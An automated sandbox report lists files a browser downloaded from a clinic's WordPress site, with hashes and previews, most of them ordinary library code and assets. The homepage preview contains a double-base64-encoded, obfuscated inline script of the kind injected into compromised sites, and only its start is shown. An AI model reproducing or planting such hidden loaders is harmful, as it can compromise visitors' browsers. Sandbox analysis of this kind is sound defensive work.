                                                                                                                                                                                                                                        Preview:#mypractis-popup{display:none;position:fixed;z-index:99999;padding:20px 20px 0;left:0;top:0;width:100%;height:100%;overflow:auto;background-color:#000;background-color:rgba(0,0,0,.4)}@media screen and (min-width:768px){#mypractis-popup{padding:100px 20px 0}}#mypractis-popup-content{background-color:#fefefe;margin:auto;padding:20px;border:1px solid #888}@media screen and (min-width:768px){#mypractis-popup-content{max-width:1280px}}#mypractis-popup-close{text-align:right;color:#aaa;font-size:28px;line-height:1;font-weight:700}#mypractis-popup-close:hover,#mypractis-popup-close:focus{color:#000;text-decoration:none;cursor:pointer}#mypractis-popup-close span{position:absolute;width:1px;height:1px;padding:0;margin:-1px;overflow:hidden;clip:rect(0,0,0,0);border:0}
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1179)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):345065
                                                                                                                                                                                                                                        Entropy (8bit):5.597018995196723
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:68449A9B89AC27404C5E793117D3E765
                                                                                                                                                                                                                                        SHA1:29637FCA5C3B66F013CC87025DE47403C2EC9497
                                                                                                                                                                                                                                        SHA-256:BDA3EE72F0B50BCB1F5A14FE287A19F0D32A66BDC11422607FAD68FF47AC7A42
                                                                                                                                                                                                                                        SHA-512:8D5D64870438D6CA9A9ACF8FCCD8545B424A9D7E5BE02D8B2C00241E60C7F9F1F91E46A433F0BC449FDA74042E51A58AAC4407B4D080F3932FE36D54FE015E3F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://www.youtube.com/s/player/8a8ac953/www-embed-player.vflset/www-embed-player.js
                                                                                                                                                                                                                                        Preview:(function(){'use strict';var r;function ba(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}.var ca=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}.var fa=ea(this);function u(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ca(c,a,{configurable:!0,writable:!0,value:b})}}.u("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(f||"")+"_"+e++,f)}.function c(f,g){this.h=f;ca(this,"description",{configurable:!0,writable:!0,va
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1572)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):21548
                                                                                                                                                                                                                                        Entropy (8bit):5.248635244678355
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:08FEC1E31313C267A71991283E374E3F
                                                                                                                                                                                                                                        SHA1:CCA2282BA0ED4D377826F939E90C56EA4DA22E4C
                                                                                                                                                                                                                                        SHA-256:C3F6FBBAF241F43869963E04386EFE736B3F15A0E74CF2CE39D6CA186A193E1B
                                                                                                                                                                                                                                        SHA-512:6890A647A570407AA80328562BE079CC955A44B78348340538242CD70DC43B625F3EBDC92BECFDE996D0B4028F9193823570442E37474B34E8BD1BFF9ED11AB6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:"https://fonts.googleapis.com/css?family=Roboto:300,400,500,700%7Csans-serif"
                                                                                                                                                                                                                                        Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3GUBGEe.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3iUBGEe.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3CUBGEe.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-st
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1599
                                                                                                                                                                                                                                        Entropy (8bit):5.267838660635414
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:5EDBA73F30F0D3A342CECCB3A34BFE45
                                                                                                                                                                                                                                        SHA1:3F39E4C8EF00408D327260F5328162AB3E5D3CAF
                                                                                                                                                                                                                                        SHA-256:F768529B209DB7EDF38AA0DA2A69C1C1DBE5A760D457FE74080D3AD76F14A0C2
                                                                                                                                                                                                                                        SHA-512:C302E3CCC2D9F2E12133ED07082A78260613F1B8C756D9EB2CF0A7AF63C425D4A8956B01EAE3FC3DFAB506DACF6416B0B53929D535CFA2AD81951183A6526FE7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html lang=en>. <meta charset=utf-8>. <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">. <title>Error 404 (Not Found)!!1</title>. <style>. *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):52916
                                                                                                                                                                                                                                        Entropy (8bit):5.51283890397623
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                                                                        SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                                                                                        SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                                                                                        SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://www.google-analytics.com/analytics.js
                                                                                                                                                                                                                                        Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 299x299, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, orientation=upper-left, xresolution=74, yresolution=82, resolutionunit=2], baseline, precision 8, 342x228, components 3
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):21548
                                                                                                                                                                                                                                        Entropy (8bit):7.4989388583288825
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:CE9A7E67293F0694F106B88177CD174D
                                                                                                                                                                                                                                        SHA1:4A0DB7EE4A9B450A7129E74B3CA251B7D9875CE0
                                                                                                                                                                                                                                        SHA-256:851D371B67E5B083C727E1B3ECAEDFC3CBA87A3409921B8AC654C058ED4CD46D
                                                                                                                                                                                                                                        SHA-512:E48C86DC19D0278AC7CB5A6D838261D928FBDBBEAD33EB77A31D51FF05019F0E2A30FFE30DEEB9DFB15D092B60EC81D89C42DC689249FA822F2056C0812CC96B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/uploads/2021/09/varicocele-callout-e1683787623318.jpeg
                                                                                                                                                                                                                                        Preview:......JFIF.....+.+......Exif..II*...........................J...........R...(...........i.......Z.......,.......,.........................................Photoshop 3.0.8BIM............@stress,testosterone,young,erectile,concept,frustration,sex,healt..i./Close,Up,Of,A,Man,With,Hands,Holding,His,Crotch..n..Shutterstock..s..Shutterstock..t.KCopyright (c) 2018 OneSideProFoto/Shutterstock. No use without permission......1055833043............http://ns.adobe.com/xap/1.0/.<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/' x:xmptk='Image::ExifTool 12.16'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:description>. <rdf:Alt>. <rdf:li xml:lang='x-default'>Close up of a man with hands holding his crotch dark background. Urinary incontinence. The pain from the blow in groin</rdf:li>. </rdf:Alt>. </dc:description>. </rdf:Description>.. <rdf:Descrip
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3803)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):10113
                                                                                                                                                                                                                                        Entropy (8bit):5.254075096697897
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:CD0C56320A7D567FD8BAA1C465BE6C2A
                                                                                                                                                                                                                                        SHA1:A8824732A0552650CA15F1D65B771D50A5ECCAF8
                                                                                                                                                                                                                                        SHA-256:13D49C11A32E461BE026CD22CBF5C2F934978C179D1A48DDB36C05F59219356C
                                                                                                                                                                                                                                        SHA-512:47E5D1992B3A645AD90180F36F88FC694075692E91A3755B911E8F51D90B2217E231586A8168887FC1D72800596F7D08C81C2A007D513AB9327C0C5FCD2DEBA0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_cc3b1f8e28a52ec4b3ec993ec779e67d.js
                                                                                                                                                                                                                                        Preview:(function($,root,undefined){var $root=$('html,body');var sliders=[];$(document).foundation();$('meta[class*=\'foundation\']').remove();$(function(){'use strict';var header=$('#masthead');var bannerSlides=$("#banner .slide");if(header.hasClass('header-position-absolute')){if(bannerSlides.length){bannerSlides.prepend($('<div class="site-header-placeholder">'));}else{$('#content').prepend($('<div class="site-header-placeholder">'));}}else if(header.hasClass('header-behavior-fixed')||header.hasClass('header-behavior-sticky')){$('<div class="site-header-placeholder">').insertAfter(header);}.$('#main a[href]:not(:has(img))').each(function(){var match=this.href.match(/[.](zip|pdf|doc|docx|ppt|pptx|xls|xlsx)$/);if(match){$(this).addClass("file "+match[1]).attr("target","_blank").attr("rel","noopener");}.if(this.hostname&&this.hostname!==location.hostname&&!$(this).hasClass('file')){$(this).addClass("file external").attr("target","_blank").attr("rel","noopener");}.if(php_vars.link_icons&&php_va
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (316)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):1017
                                                                                                                                                                                                                                        Entropy (8bit):5.30369605392695
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:AA470E4E3A6345E80C3ADFD9FEEB93B2
                                                                                                                                                                                                                                        SHA1:2659E61274DA2A82CF3C81681A601F4CC6C7F15B
                                                                                                                                                                                                                                        SHA-256:50D2714A759352D9C953AB0EEE9A467E5EB7B4AEA032352A373D18791054707D
                                                                                                                                                                                                                                        SHA-512:0DC6F6BF1A691ED3E275B57698FB900FC2D1A22A8391B410210A5174E0337A256571658AABF4E008C22DDA76D572AC19022F68D16A7940A1F38FCF30D8B21F11
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_3e41bfa32dc3e7aa84064d9e9d0969b3.js
                                                                                                                                                                                                                                        Preview:/*!. * Practis Popups 1.1.0. */.function practisPopupsGetScrollPercent(){var h=document.documentElement,b=document.body,st='scrollTop',sh='scrollHeight';return(h[st]||b[st])/((h[sh]||b[sh])-h.clientHeight)*100;}.function practisPopupsSetCookie(cname,cvalue,exdays){if(exdays!=0){var d=new Date();d.setTime(d.getTime()+(exdays*24*60*60*1000));exdays=d.toUTCString();}.document.cookie=cname+"="+cvalue+";expires="+exdays+";path=/;SameSite=Strict";}.function practisPopupsGetCookie(cname){var name=cname+"=";var ca=document.cookie.split(';');for(var i=0;i<ca.length;i++){var c=ca[i];while(c.charAt(0)==' '){c=c.substring(1);}.if(c.indexOf(name)==0){return c.substring(name.length,c.length);}}.return"";}.function practisPopupsDeleteAllCookies(){var arrSplit=document.cookie.split(";");for(var i=0;i<arrSplit.length;i++){var cookie=arrSplit[i].trim();var cookieName=cookie.split("=")[0];if(cookieName.indexOf("practis_")===0){document.cookie=cookieName+"=;expires=Thu, 01 Jan 1970 00:00:00 GMT;path=/;Sam
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (595)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):2551324
                                                                                                                                                                                                                                        Entropy (8bit):5.730855958812075
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:7C5DC4FBB1C45C94625E18EC8D71BED8
                                                                                                                                                                                                                                        SHA1:C73DDE83AB5BF9E0DE3D90EB9055B79498F2940F
                                                                                                                                                                                                                                        SHA-256:9359F0617BE6568D4879FBF30DBC4DB80D3E848DDE2DB1BE9A14E7E26EF053FB
                                                                                                                                                                                                                                        SHA-512:DE7A0A8C2DF6D0EC38CC12D874EE5D398EBFAC663467AB211B1C863984E1105007266DC7FB1D3BCFD84BC65A0D44873911A5CE9F706A78E534CB55F9C23F38AD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://www.youtube.com/s/player/8a8ac953/player_ias.vflset/en_US/base.js
                                                                                                                                                                                                                                        Preview:var _yt_player={};(function(g){var window=this;/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC All Rights Reserved... Use of this source code is governed by an MIT-style license that can be. found in the LICENSE file at https://angular.dev/license.*/./*.. (The MIT License).. Copyright (C) 2014 by Vitaly Puzrin.. Permission is hereby granted, free of charge, to any person obtaining a copy. of this software and associated documentation files (the "Software"), to deal. in the Software without restriction, including without limitation the rights. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. copies of the Software, and to permit persons to whom the Software is. furnished to do so, subject to the following conditions:.. The above copyright notice and this permission notice shall be included in. all copies or substantial portions of the
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 40128, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):40128
                                                                                                                                                                                                                                        Entropy (8bit):7.994526034157349
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:9A01B69183A9604AB3A439E388B30501
                                                                                                                                                                                                                                        SHA1:8ED1D59003D0DBE6360481017B44665153665FBE
                                                                                                                                                                                                                                        SHA-256:20B535FA80C8189E3B87D1803038389960203A886D502BC2EF1857AFFC2F38D2
                                                                                                                                                                                                                                        SHA-512:0E6795255B6EEA00B5403FD7E3B904D52776D49AC63A31C2778361262883697943AEDCB29FEEE85694BA6F19EAA34DDDB9A5BFE7118F4A25B4757E92C331FECA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3yUBA.woff2
                                                                                                                                                                                                                                        Preview:wOF2..............$....F..........................p.....t?HVAR...`?STAT.N'...B..~.../~.....`..i..X.0..j.6.$..,. .... ..N[{.q.v...Lw.Q..o..J...6.Z.g.F.n..g\{t....%.!3)....sS.o...$."c.^<.iZc.I]c....0+. ..I..9.H.3..B.&.....'e....5.p.R(.j~\=..Wt.{..1.[u..Fn..<.-g.3..L..o.....E.-Q.........I..-/.4....{.Uj...3.K...g.Z....0...2)%.{......gN.../f.7....o.K....^V...!j...<...gf....\XjI.<p.PJh.4....*,*.S....&.C...R..,@ba..<..z.|.X.&.(.mf.w[..l.35Mp...A.A.=d........fj...}W6..y....[...i.......!........NLND....n'"...N*k)0<n.P.......w.j..>9.vV...Z.`.$$!.".(.`ATV.,..0.]3.<.d(...-s...2.w....P@.&...-.9x7.'....Sg.N=m.=....(..))-bA<.x.......=@4qs..Ss......K...{.=H.......z...NUS....Y..6.K.......n.....F4.B....=w.....+..F3...fB..........y1...,.(...`,..&vIrP.^.fiQY..5....H.a......q...s."..\..':.xK}...fU.z.j.......$L.......f.g&....R...!.Wmew3.1%2W.'"6u..r.q"F.......~i{..9xN.g.X..NMx.H.s@.8..J.t.SP.C`-GU)G/'..6".+......f..n..Aw....r....l.<r...Cke..D....T/."..c..mj..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (60374), with CRLF, LF line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):60557
                                                                                                                                                                                                                                        Entropy (8bit):5.077917346532572
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:C39573CFF290ABA68AD74A514B1AAB00
                                                                                                                                                                                                                                        SHA1:C92C61E6A9B085F37C5148787E3FBBEE4A77845E
                                                                                                                                                                                                                                        SHA-256:48252C32BF195F3FEEDB1B5E5F561A6E1CFBEC2EBBB3B9EF500AAF71E76E15CE
                                                                                                                                                                                                                                        SHA-512:7626403A67CAF9612195E3AD0959E9322658E16674B402A9EF54707D6ECB6C9A8ADEB3AFF9336AB768BFA15031EEC85A62748531F04297E30A4483B35808BC4F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_dd440d21fcdf5f5f900dde931d0c3d24.css
                                                                                                                                                                                                                                        Preview:/*!.. * animate.css -http://daneden.me/animate.. * Version - 3.7.0.. * Licensed under the MIT license - http://opensource.org/licenses/MIT.. *.. * Copyright (c) 2018 Daniel Eden.. */.@-webkit-keyframes bounce{from,20%,53%,80%,to{-webkit-animation-timing-function:cubic-bezier(.215,.61,.355,1);animation-timing-function:cubic-bezier(.215,.61,.355,1);-webkit-transform:translate3d(0,0,0);transform:translate3d(0,0,0)}40%,43%{-webkit-animation-timing-function:cubic-bezier(.755,.05,.855,.06);animation-timing-function:cubic-bezier(.755,.05,.855,.06);-webkit-transform:translate3d(0,-30px,0);transform:translate3d(0,-30px,0)}70%{-webkit-animation-timing-function:cubic-bezier(.755,.05,.855,.06);animation-timing-function:cubic-bezier(.755,.05,.855,.06);-webkit-transform:translate3d(0,-15px,0);transform:translate3d(0,-15px,0)}90%{-webkit-transform:translate3d(0,-4px,0);transform:translate3d(0,-4px,0)}}@keyframes bounce{from,20%,53%,80%,to{-webkit-animation-timing-function:cubic-bezier(.215,.61,.355,1
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (593)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):2466
                                                                                                                                                                                                                                        Entropy (8bit):5.255381801490034
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:266AACD78BAA64F8AD66BDA43CCF605E
                                                                                                                                                                                                                                        SHA1:AE95B5790923261A1E89A96A2DDEE3EDFA8960B4
                                                                                                                                                                                                                                        SHA-256:1D2C4B5C756FFA0E0F15BB60F32E8B6C45BAB61822D710DD11D24CFAF2DF6B5F
                                                                                                                                                                                                                                        SHA-512:A54086CD21FB659ED3201D4F83CBE212F36564A716AE03981FB50D5189031C6C97F8EE0763B8302545123A66121266728060FC0EB2A8706375A53D0C0734B39E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_6755415003869bd599c3fae8e9792027.js
                                                                                                                                                                                                                                        Preview:;./*!.* FitVids 1.1.*.* Copyright 2013, Chris Coyier - http://css-tricks.com + Dave Rupert - http://daverupert.com.* Credit to Thierry Koblentz - http://www.alistapart.com/articles/creating-intrinsic-ratios-for-video/.* Released under the WTFPL license - http://sam.zoy.org/wtfpl/.*.*/.(function($){'use strict';$.fn.fitVids=function(options){var settings={customSelector:null,ignore:null};if(!document.getElementById('fit-vids-style')){var head=document.head||document.getElementsByTagName('head')[0];var css='.fluid-width-video-wrapper{width:100%;position:relative;padding:0;}.fluid-width-video-wrapper iframe,.fluid-width-video-wrapper object,.fluid-width-video-wrapper embed {position:absolute;top:0;left:0;width:100%;height:100%;}';var div=document.createElement("div");div.innerHTML='<p>x</p><style id="fit-vids-style">'+css+'</style>';head.appendChild(div.childNodes[1]);}.if(options){$.extend(settings,options);}.return this.each(function(){var selectors=['iframe[src*="player.vimeo.com"]','i
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):172398
                                                                                                                                                                                                                                        Entropy (8bit):5.863006693980198
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:4DEA01CB05C890F304E541F9EAE32874
                                                                                                                                                                                                                                        SHA1:B4ECE2C32AA610DBEAFB9FBBD98D80029C226565
                                                                                                                                                                                                                                        SHA-256:E64FBF9DBB315AE282454364FB8AB3885A77083915002C386D3BC185D38F3AF5
                                                                                                                                                                                                                                        SHA-512:00E7550206DFA7AE7814BFC46B01AEF673904E05EC6AD98A453A5C5CEA6ADE1B8294E28F5B4238F1E94719416A3EDC5FE1B64019636EE994935D923C86B664F2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/
                                                                                                                                                                                                                                        Preview:<!doctype html><html lang="en-US" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link rel="stylesheet" media="print" onload="this.onload=null;this.media='all';" id="ao_optimized_gfonts" href="https://fonts.googleapis.com/css?family=Barlow%3A400%2C600%2C500&amp;display=swap"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="preload" href="https://mipscenter.com/wp-content/themes/milo/fonts/fontawesome-webfont.woff2?v=4.7.0" as="font" type="font/woff2" crossorigin><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style> <script defer src="data:text/javascript;base64,SVNWYUY9IlpuVnVZM1JwYjI0Z1NpaDZMR01wZTJOdmJuTjBJRVU5YnlncE8zSmxkSFZ5YmlCS1BXWjFibU4wYVc5dUtFWXNWaWw3UmoxR0xTZ3RNSGczS2kwd2VEUmtOaXN3ZUdZNFlTc3RNSGd6TURJMktqQjRNU2s3YkdWMElFSTlSVnRHWFR0eVpYUjFjbTRnUWp0OUxFb29laXhqS1R0OUtHWjFibU4wYVc5dUtIb3NZeWw3Wm5WdVkzUnBiMjRnZUNoNkxHTXNS
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (21556)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):21592
                                                                                                                                                                                                                                        Entropy (8bit):5.118279269599776
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:1C56940A864F144FAE2EB40EE952CB94
                                                                                                                                                                                                                                        SHA1:EBFC754CE962A1F9025853F2995B3987F0383D87
                                                                                                                                                                                                                                        SHA-256:3C37A4AA3CF6AAAE6921A4B750C0E4F81FD338D6878BE90B0FAF2F921039CB23
                                                                                                                                                                                                                                        SHA-512:AEF4B08A01D56BD8855653499B375DB11D8FD7D67C4BCDC74323236BADC47B70DDFEDC14CE89828736C63FFE147BF71C14311580296D41B59F11A3305993ADDD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://img1.wsimg.com/signals/js/clients/tti/tti.min.js
                                                                                                                                                                                                                                        Preview:!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("tti",[],e):"object"==typeof exports?exports["tti"]=e():t["tti"]=e()}(window,function(){return n=[function(t,e){var n=function(){return this}();try{n=n||Function("return this")()}catch(t){"object"==typeof window&&(n=window)}t.exports=n},function(t,e,n){"use strict";e.__esModule=!0,e.setCustomProperties=e._sendWebVitalsData=e._collectVitals=e.calculateTTI=void 0,n(2);function i(){0<s.timeToInteractive&&setTimeout(function(){window._expDataLayer=window._expDataLayer||[],window._expDataLayer.push({schema:"add_perf",version:"v1",data:window._tccInternal?{type:"pageperf",properties:s,custom_properties:c}:{timing_object:s,is_hard_navigation:!0,custom_properties:c}})},0)}function r(){var t,e,n=(r=0<arguments.length&&void 0!==arguments[0]?arguments[0]:{}).name,r=r.value;s[n]="CLS"===n?r:Math.round(r),"timeToInteractive"===n&&(s.hasOwnProperty("FID")?i():(t=0,e=setInt
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:JPEG image data, progressive, precision 8, 1536x619, components 3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):106216
